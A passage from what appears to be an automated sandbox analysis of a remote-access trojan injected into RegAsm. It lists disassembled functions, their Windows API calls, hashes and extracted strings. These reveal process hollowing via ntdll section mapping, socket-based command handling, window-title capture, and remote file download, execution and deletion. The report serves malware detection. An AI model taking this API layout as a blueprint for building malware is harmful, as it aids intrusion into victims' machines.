                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap$_free
                                                • String ID:
                                                • API String ID: 1482568997-0
                                                • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEventStartupsocket
                                                • String ID:
                                                • API String ID: 1953588214-0
                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                Download Yara Rule
                                                APIs
                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                • String ID:
                                                • API String ID: 3750050125-0
                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 0041BB49
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$ForegroundText
                                                • String ID:
                                                • API String ID: 29597999-0
                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                • String ID:
                                                • API String ID: 1170566393-0
                                                • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                • String ID:
                                                • API String ID: 2948481953-0
                                                • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: __crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 3768137683-0
                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alldvrm
                                                • String ID:
                                                • API String ID: 65215352-0
                                                • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Deallocatestd::_
                                                • String ID:
                                                • API String ID: 1323251999-0
                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                Non-executed Functions

                                                Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                • API String ID: 1067849700-181434739
                                                • Opcode ID: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                • Opcode Fuzzy Hash: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
